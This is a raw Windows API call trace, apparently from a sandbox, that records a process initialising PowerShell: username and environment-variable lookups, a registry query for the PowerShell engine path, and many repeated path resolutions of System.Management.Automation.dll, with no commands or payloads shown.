	[0344.842] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75ea70, nSize=0x14d7f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d7f8) returned 0x1
	[0344.842] CoTaskMemFree (pv=0x1b75ea70) 
	[0344.842] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0344.842] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d838 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d838) returned 1
	[0344.843] CoTaskMemFree (pv=0x245a70) 
	[0344.845] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e5a810*="Available", lpRawData=0x2e5a5a0) returned 1
	[0345.044] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.044] CoTaskMemFree (pv=0x1f7900) 
	[0345.044] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.044] CoTaskMemFree (pv=0x1f7900) 
	[0345.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.047] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.047] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0345.047] CoTaskMemFree (pv=0x1f7900) 
	[0345.047] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.047] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0345.047] CoTaskMemFree (pv=0x1f7900) 
	[0345.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.049] GetCurrentProcessId () returned 0x890
	[0345.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.053] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d818 | out: phkResult=0x14d818*=0x31c) returned 0x0
	[0345.053] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d79c, lpData=0x0, lpcbData=0x14d798*=0x0 | out: lpType=0x14d79c*=0x1, lpData=0x0, lpcbData=0x14d798*=0x56) returned 0x0
	[0345.053] CoTaskMemAlloc (cb=0x5a) returned 0x2a06f0
	[0345.053] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d76c, lpData=0x2a06f0, lpcbData=0x14d768*=0x56 | out: lpType=0x14d76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d768*=0x56) returned 0x0
	[0345.053] CoTaskMemFree (pv=0x2a06f0) 
	[0345.054] RegCloseKey (hKey=0x31c) returned 0x0
	[0345.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.056] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.056] CoTaskMemFree (pv=0x1f7900) 
	[0345.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
